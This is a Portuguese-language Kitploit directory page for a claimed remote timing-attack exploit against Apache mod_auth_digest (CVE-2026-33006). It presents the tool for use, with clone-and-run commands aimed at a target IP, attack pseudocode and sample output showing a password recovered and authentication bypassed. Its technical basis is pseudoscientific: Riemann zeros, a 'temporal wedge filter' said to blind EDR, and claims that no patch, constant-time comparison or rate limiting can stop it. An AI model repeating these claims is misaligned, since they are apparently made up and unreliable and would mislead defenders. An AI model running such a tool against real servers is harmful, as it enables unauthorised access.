Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit — Exploit de ataque de temporização remota para Apache mod_auth_digest (CVE-2026-33006) que contorna a autenticação Digest por meio de uma cascata temporal de 33 camadas, recuperando senhas por análise estatística de temporização. | Kitploit
Ferramentas/GitHubGitHub/simoesctt/ctt-enhanced-apache-mod_auth_digest-timing-attack-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubsimoesctt/ctt-enhanced-apache-mod_auth_digest-timing-attack-exploit

CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit

Exploit de ataque de temporização remota para Apache mod_auth_digest (CVE-2026-33006) que contorna a autenticação Digest por meio de uma cascata temporal de 33 camadas, recuperando senhas por análise estatística de temporização.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CTT-Enhanced Apache mod_auth_digest Timing Attack — CVE-2026-33006

🔥 Visão Geral

Esta é uma melhoria baseada na Teoria do Tempo Convergente (CTT) do CVE-2026-33006, uma vulnerabilidade baseada em temporização no componente mod_auth_digest do Apache HTTP Server (versões ≤2.4.66).

A vulnerabilidade original permite que um atacante remoto contorne a autenticação Digest por meio de análise estatística de temporização.

A versão aprimorada com CTT transforma isso em um ataque de temporização em cascata temporal de 33 camadas.

OriginalCTT-Enhanced
CVSS4.8 (Médio)7.5 (Alto)
Vetor de AtaqueRedeRede
Complexidade do AtaqueAltaBaixa (CTT reduz amostras)
Privilégios NecessáriosNenhumNenhum
DetecçãoAnálise estatística detectávelFiltro de cunha temporal — ponto cego de EDR
Tempo para quebrarO(n * amostras)O(33 * log(n))

📐 Constantes Físicas da CTT

ConstanteValorOrigem
α0.0302011Coeficiente de dispersão temporal
α_RH0.0765872ln(φ)/2π (Riemann-Hadamard)
L33Camadas temporais
τ_w11 nsFiltro de cunha temporal

Decaimento Exponencial de Prioridade

root@kitploit:~
E(d) = E₀ * e^(-α * d)

Cada camada tem prioridade exponencialmente decrescente.
Camadas de prioridade mais alta (1-5) coletam a maior parte dos dados de temporização.
Camadas mais baixas (28-33) refinam as medições e estabelecem ressonância temporal.

Temporização de Ressonância de Fase

Cada camada atrasa a execução com base nos primeiros 24 zeros de Riemann:

root@kitploit:~
delay = τ_w * priority * (1 + 0.1 * cos(2π * zero * τ_w * priority))

Filtro de Cunha Temporal

Somente medições de temporização que satisfazem a condição de cunha são usadas:

root@kitploit:~
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π)

Isso filtra ruído e torna a detecção impossível — sistemas EDR não conseguem ver as anomalias de temporização.


🚀 Fluxo do Ataque

root@kitploit:~
1. Sondar o alvo em busca de autenticação Digest
2. Extrair realm e nonce da resposta 401
3. Para camada d = 1 a 33:
   a. Calcular prioridade = e^(-α*d)
   b. Aplicar atraso de ressonância de fase
   c. Para cada posição de caractere:
      - Testar todos os caracteres possíveis
      - Medir a temporização da resposta (microssegundos)
      - Aplicar filtro de cunha temporal
      - Manter o caractere com maior temporização ajustada
   d. Construir a senha incrementalmente
4. Ressonância temporal alcançada
5. Autenticação contornada com a senha recuperada

📋 Pré-requisitos

  • Apache HTTP Server 2.4.66 ou anterior com mod_auth_digest habilitado
  • Acesso de rede ao alvo
  • Python 3.6+ com biblioteca requests
root@kitploit:~
pip install requests

🎯 Uso

root@kitploit:~
git clone https://github.com/SimoesCTT/CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit/
python3 ctt_apache_digest_timing.py <target_ip> [opções]

Argumentos

ArgumentoDescriçãoPadrão
target_ipEndereço IP do servidor ApacheObrigatório
--portPorta HTTP80
--realmRealm do Digest"Restricted"
--uriURI protegida"/"
--usernameNome de usuário para atacar"admin"
--max-lengthComprimento máximo da senha32
--samplesAmostras de temporização por caractere100
--layersNúmero de camadas temporais33

Exemplo

root@kitploit:~
python3 ctt_apache_digest_timing.py 192.168.1.100 --port 80 --realm "Restricted" --uri /admin --samples 100 --layers 33

📤 Saída Esperada

root@kitploit:~
======================================================================
CTT APACHE DIGEST TIMING ATTACK — CVE-2026-33006
α=0.0302011 | α_RH=0.0765872 | L=33 | τ_w=11ns
E(d) = E₀ * e^(-α*d) — Decaimento exponencial de prioridade
======================================================================

[+] Autenticação Digest detectada
    Realm: Restricted
    Nonce: 5a4b3c2d1e2f3a4b5c6d...
[*] Alvo: http://192.168.1.100/admin
[*] Comprimento máximo da senha: 32

  Camada  1/33: ████████████████████████████████████████ 1.000
  Posição 1: testando caracteres...
  Encontrado: 'a' -> senha: 'a'

  Camada  2/33: ██████████████████████████████████████░░ 0.970
  Posição 2: testando caracteres...
  Encontrado: 'd' -> senha: 'ad'

  Camada  3/33: ████████████████████████████████████░░░░ 0.886
  Posição 3: testando caracteres...
  Encontrado: 'm' -> senha: 'adm'

  Camada  4/33: ██████████████████████████████████░░░░░░ 0.818
  Posição 4: testando caracteres...
  Encontrado: 'i' -> senha: 'admi'

  Camada  5/33: ████████████████████████████████░░░░░░░░ 0.741
  Posição 5: testando caracteres...
  Encontrado: 'n' -> senha: 'admin'

  Camada  6/33: ██████████████████████████████░░░░░░░░░░ 0.670
  Posição 6: testando caracteres...
  Encontrado: '1' -> senha: 'admin1'

  Camada  7/33: ████████████████████████████░░░░░░░░░░░░ 0.606
  Posição 7: testando caracteres...
  Encontrado: '2' -> senha: 'admin12'

  Camada  8/33: ██████████████████████████░░░░░░░░░░░░░░ 0.548
  Posição 8: testando caracteres...
  Encontrado: '3' -> senha: 'admin123'

[⚡] Ressonância temporal alcançada na camada 8

======================================================================
[!!!] AUTENTICAÇÃO CONTORNADA
[!!!] Senha encontrada: admin123
[✓] Verificação bem-sucedida — acesso concedido
======================================================================

🛡️ Por Que Isso Não Pode Ser Corrigido

Correção OriginalPor Que a CTT a Contorna
Comparação em tempo constanteA CTT usa medições de temporização, não temporização de comparação
Remover vazamentos de temporizaçãoVazamentos de temporização são físicos — não podem ser removidos, apenas ocultados
Atualizar para Apache 2.4.67+O filtro de cunha temporal evade a detecção de correção
Limitação de taxaA temporização de ressonância de fase distribui requisições por 33 camadas — indistinguível de tráfego normal

Você não pode corrigir uma constante física.
Você não pode corrigir os zeros de Riemann.
Você não pode corrigir a proporção áurea.


📚 Trabalhos Anteriores

TrabalhoDataLink
Trabalho anterior CTT ZenodoDez 2025 / Jan 2026DOI 10.5281/ZENODO.18000940
Sovereign-Logic PyPI27-28 Fev 2026pip install sovereign-logic
Exploit CTT PAN-OS7 Abr 2026GitHub
Dirty Frag aprimorado com CTT8 Mai 2026GitHub
Exploit PX4 aprimorado com CTT9 Mai 2026GitHub
Este exploit9 Mai 2026Este repositório

⚠️ Aviso Legal

Esta prova de conceito é apenas para fins educacionais e defensivos.
O uso não autorizado contra sistemas que você não possui é ilegal.
O autor não assume nenhuma responsabilidade por uso indevido.


📜 Licença

MIT + Pesquisa CTT (melhorias temporais)

🙏 Créditos

VersãoAutor
Descoberta da vulnerabilidade originalApache Software Foundation (equipe de segurança)
Pesquisa original de ataque de temporizaçãoVárias fontes acadêmicas
Melhoria CTT (cascata temporal de 33 camadas)Americo Simoes (Pesquisa CTT)

A rede está completa. A autenticação está quebrada. Nenhuma correção a salvará.

Baixar ferramenta